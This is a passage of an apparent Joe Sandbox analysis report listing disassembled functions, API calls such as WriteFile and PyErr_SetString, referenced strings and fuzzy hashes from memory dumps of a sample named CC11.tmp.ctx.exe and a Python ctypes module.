PyLong_AsVoidPtr.PYTHON38 ref: 00007FF8BFB79D1F
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB79D28

Strings

integer expected, xrefs: 00007FF8BFB79D08

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$Long_OccurredStringVoid
String ID: integer expected
API String ID: 1621529885-2140524511
Opcode ID: d7e12a5a84ba3b5816ac9245441cbdfbdf4e16f5050b299c09b493440ede2c38
Instruction ID: 02f20f89c3e2a541b11cc061e7f4bb7de644fd4d0139b18c3547fe31c6ccedb6
Opcode Fuzzy Hash: d7e12a5a84ba3b5816ac9245441cbdfbdf4e16f5050b299c09b493440ede2c38
Instruction Fuzzy Hash: 18F05E21B0D74791EE049F9AE5442796760EF89FD4F589030DB4E07765DE2CD484C700

Function 00007FF8BFB77F94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON38 ref: 00007FF8BFB77F97
PyMem_Free.PYTHON38 ref: 00007FF8BFB77FA0
PyErr_Format.PYTHON38 ref: 00007FF8BFB77FBA

Strings

second item in _fields_ tuple (index %zd) must be a C type, xrefs: 00007FF8BFB77FB0

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: DeallocErr_FormatFreeMem_
String ID: second item in _fields_ tuple (index %zd) must be a C type
API String ID: 3237669406-2717732800
Opcode ID: 005435b0ef9407ab09b5a462a8de8b0f0626b263dac59c8c198cb6ebb4c16b1b
Instruction ID: 7df786b68d22f7191e784126f28b0f73fc2a064b5b0c46593f9c1ffaeea398ae
Opcode Fuzzy Hash: 005435b0ef9407ab09b5a462a8de8b0f0626b263dac59c8c198cb6ebb4c16b1b
Instruction Fuzzy Hash: 4AE06224A0DA4391E614AFEDE8540782760AFC5FD5B104231DA1F476B5CF3CE549D305

Function 00007FF69002B8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF69002B92F
WriteFile.KERNEL32 ref: 00007FF69002BBF7
WriteFile.KERNEL32 ref: 00007FF69002BC3D
GetLastError.KERNEL32 ref: 00007FF69002BCF3

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction ID: c06975508efff32dfaf1af3e4da627690b783b6fe90eb2097004a056e7bc40af
Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
Instruction Fuzzy Hash: 67D1DF72B18A81A9E721CF79D4402AC37B2FB44B98B1442B6DE5E97B9DDE38D517C300

Function 00007FF69002C270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69002C25B), ref: 00007FF69002C38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69002C25B), ref: 00007FF69002C417

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction ID: 0219f2ecabbdaf2371d1ac489016fb3e55e351a4e53d8cb56e150af9cfcb5535
Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
Instruction Fuzzy Hash: 2691B472E08651A5F770DF799450ABD2BA1FB44B88F544179DE0EA6B8DDF38E482C700

Function 00007FF8BFB7B460 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

PyMem_Malloc.PYTHON38 ref: 00007FF8BFB7B47C
memcpy.VCRUNTIME140 ref: 00007FF8BFB7B495
PyMem_Free.PYTHON38 ref: 00007FF8BFB7B4B4
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7B4E4

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Mem_$DeallocFreeMallocmemcpy
String ID:
API String ID: 1346496523-0
Opcode ID: cd1faa9cd6bc9fcf4481885c5218df6ea04b1359ee28e5919f622cf77473978f
Instruction ID: 9d5ee73b731fb598c62af2c2efccfd4232386547259b0b7cefaf08b4be10e194
Opcode Fuzzy Hash: cd1faa9cd6bc9fcf4481885c5218df6ea04b1359ee28e5919f622cf77473978f
Instruction Fuzzy Hash: 90216A62A09B4281EB699B9AE85017D27B1FF88FD0B048535DB5E07B99DF3CE461C740

Function 00007FF690012030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF690012064
SetWindowLongPtrW.USER32 ref: 00007FF690012086
GetWindowLongPtrW.USER32 ref: 00007FF6900120B0
InvalidateRect.USER32 ref: 00007FF6900120D0

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: 12af31a49459fafde35b0062c51bb97e609a924e083d0ae66dc763579da81dd5
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: 1711E521E0814252FAB69B7AE5442B91292EF8CB88F848171EA4D87B8FCD2CD4E18600

Function 00007FF8BFB74668 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PyDescr_NewGetSet.PYTHON38 ref: 00007FF8BFB74695
PyDict_SetItemString.PYTHON38 ref: 00007FF8BFB746AC
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB793A7
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB793BF

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$Descr_Dict_ItemString
String ID:
API String ID: 975051370-0
Opcode ID: d8a4eaa814511476155a84e271f8be3e0b3fe2d8030b4c9334b05d05d5822cab
Instruction ID: f3190647f5b0f6e32debc7355427a5bd94404543034cb806a70f47982dd364b6
Opcode Fuzzy Hash: d8a4eaa814511476155a84e271f8be3e0b3fe2d8030b4c9334b05d05d5822cab
Instruction Fuzzy Hash: 7B117C25A0EA42C5EF588F9AA94037A37A0EF89FD1F084130DF5E82799DF3CE0918700

Function 00007FF8BFB713BC Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB74E64: _PyObject_MakeTpCall.PYTHON38(?,?,?,00007FF8BFB713E9), ref: 00007FF8BFB74E83

PyWeakref_NewProxy.PYTHON38 ref: 00007FF8BFB71406
PyDict_SetItem.PYTHON38 ref: 00007FF8BFB71427
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7706F
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7707E

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc$CallDict_ItemMakeObject_ProxyWeakref_
String ID:
API String ID: 1512266493-0
Opcode ID: ee14201d288885dab2d3b72eca7127d67ec00b39f4c2a441eb93ece7867c3194
Instruction ID: 4628fe46c482dca55aed6a0d6da2e326aaf82ece30825d3e32b348f783669e95
Opcode Fuzzy Hash: ee14201d288885dab2d3b72eca7127d67ec00b39f4c2a441eb93ece7867c3194
Instruction Fuzzy Hash: 29114532A09B82C5EA549FAAA844179B7A8EB89BD4B184131DF5E4779ADE3CE441C700

Function 00007FF69001C330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF69001C35C
GetCurrentThreadId.KERNEL32 ref: 00007FF69001C36A
GetCurrentProcessId.KERNEL32 ref: 00007FF69001C376
QueryPerformanceCounter.KERNEL32 ref: 00007FF69001C386

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: 9ca3e75ac5f656dd08f6fd25b59cfb02fb4f2395cf019a7a4db2c09b25091ac1
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: D5111822B14B059AEB108B70E8542A933A4FB59758F441E31EA6D86BA8EF78D1988340

Function 00007FF8BFB7C97C Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

_PyObject_GC_NewVar.PYTHON38(?,?,?,00007FF8BFB7D3AC,?,?,?,?,?,00007FF8BFB7748C), ref: 00007FF8BFB7C993
memset.VCRUNTIME140(?,?,?,00007FF8BFB7D3AC,?,?,?,?,?,00007FF8BFB7748C), ref: 00007FF8BFB7C9B5
memset.VCRUNTIME140 ref: 00007FF8BFB7C9EA
PyObject_GC_Track.PYTHON38 ref: 00007FF8BFB7C9F2

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Object_memset$Track
String ID:
API String ID: 225649448-0
Opcode ID: a786a447b7de81fdd416b21125803142f81c2d228cba119be79dd88451351a2b
Instruction ID: 866768cd7f74a315f5c2e604f5e9f495b70e6a546d1780a7ed0468bf3425cd02
Opcode Fuzzy Hash: a786a447b7de81fdd416b21125803142f81c2d228cba119be79dd88451351a2b
Instruction Fuzzy Hash: 5B015EA3A24B4583EB15DF6AD5453B833A1FB98B98F444239CB0C07696DF7CD988C340

Function 00007FF690034E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF690030A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690030AA3

_get_daylight.LIBCMT ref: 00007FF690034F44
_get_daylight.LIBCMT ref: 00007FF690034F55

Strings

?, xrefs: 00007FF690034ED5

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction ID: e1dcb3100f6a0f1517aa93ec2d3608b3295c3d7a10a76c201011125beb336e72
Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction Fuzzy Hash: 3241F612A0868266FF369B35D441B7A6790EF84BA4F144275EE5C8ABDDDF3CE481C700

Function 00007FF69002832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002835E

Part of subcall function 00007FF690029C58: HeapFree.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69001BEC5), ref: 00007FF69002837C

Strings

C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe, xrefs: 00007FF69002836A

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
API String ID: 3580290477-991927476
Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction ID: 323837247eeec7fd44fbcaff1b2c024b14c6b0abaa7082e72304a3d6f93d6ce2
Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction Fuzzy Hash: 9F417F3AA0DB56A6EB34DF39A4810FD2794EF45B94B554075EA4E87B8DDF3CE4828300

Function 00007FF69002F8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002F916

Part of subcall function 00007FF69002E8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF69002E908

Strings

., xrefs: 00007FF69002F967
:, xrefs: 00007FF69002F956

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: 73f54d41e2f65cec490ecc893310b0faf8beab10b95a0916934e12cbd7a72e3a
Instruction ID: 5a2d6bfc6d16ccbdcb5e4487e37e3528000c87e49f01a57fc38edfa98d1e5d95
Opcode Fuzzy Hash: 73f54d41e2f65cec490ecc893310b0faf8beab10b95a0916934e12cbd7a72e3a
Instruction Fuzzy Hash: 17414B22F08752A8FB21DBB998512BD26B4EF14798F540079DE4DA7B8DEF38D4878310

Function 00007FF69002BF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF69002C05F
GetLastError.KERNEL32 ref: 00007FF69002C081

Strings

U, xrefs: 00007FF69002C00B

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction ID: 18226b86f7da60d0ba9c0e6db2c843782155f68460b394313a35138751256fd4
Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction Fuzzy Hash: 1541B122A18A8595DB60CF39E8447A97761FB98794F904131EE4DC7B88EF7CD442CB40

Function 00007FF69002E8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF69002E908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF69002E95A

Strings

:, xrefs: 00007FF69002E91E

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
Instruction ID: c604af56524368840ac1af1f69b0d6af01d69526383a0a9e493e24773caff9a6
Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
Instruction Fuzzy Hash: 9721B422B086C1D1EB74DB29D04427E77A2FB88B44F554076DA8D83789DF7CE986C741

Function 00007FF69001F068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF69001F0B8
RaiseException.KERNEL32 ref: 00007FF69001F0F9

Strings

csm, xrefs: 00007FF69001F0E6

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: 65a421ec1a41d30ea9004b64c226a5e4f7d4b14b023dd00de55671022b1f262a
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: 8A115B36618B8492EB628B25F44026AB7E1FB8CB98F184270EF8D47769DF3CD5518B00

Function 00007FF8BFB7AD94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38(?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7ADC4
PyErr_SetString.PYTHON38(?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7ADDF

Strings

not a ctype instance, xrefs: 00007FF8BFB7ADD5

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_StringSubtypeType_
String ID: not a ctype instance
API String ID: 468607378-3181906287
Opcode ID: f85a89c331f72c57455bf836e543c031331b8f11e23131311cae0cf5cabf6560
Instruction ID: 3270f8c495ec412b353b4faeb906d6d7934bc834b6a1ea12a09f744c08c8cf57
Opcode Fuzzy Hash: f85a89c331f72c57455bf836e543c031331b8f11e23131311cae0cf5cabf6560
Instruction Fuzzy Hash: F9112A21B0DB4685EA509B9AF85006AA7A4FB89FD4F184131EF9D47B6ADE3CD141C700

Function 00007FF8BFB7A3C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON38 ref: 00007FF8BFB7A3ED

Part of subcall function 00007FF8BFB7AD94: PyType_IsSubtype.PYTHON38(?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7ADC4
Part of subcall function 00007FF8BFB7AD94: PyErr_SetString.PYTHON38(?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7ADDF

Strings

Pointer does not support item deletion, xrefs: 00007FF8BFB7A3E3
NULL pointer access, xrefs: 00007FF8BFB7A40B

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_String$SubtypeType_
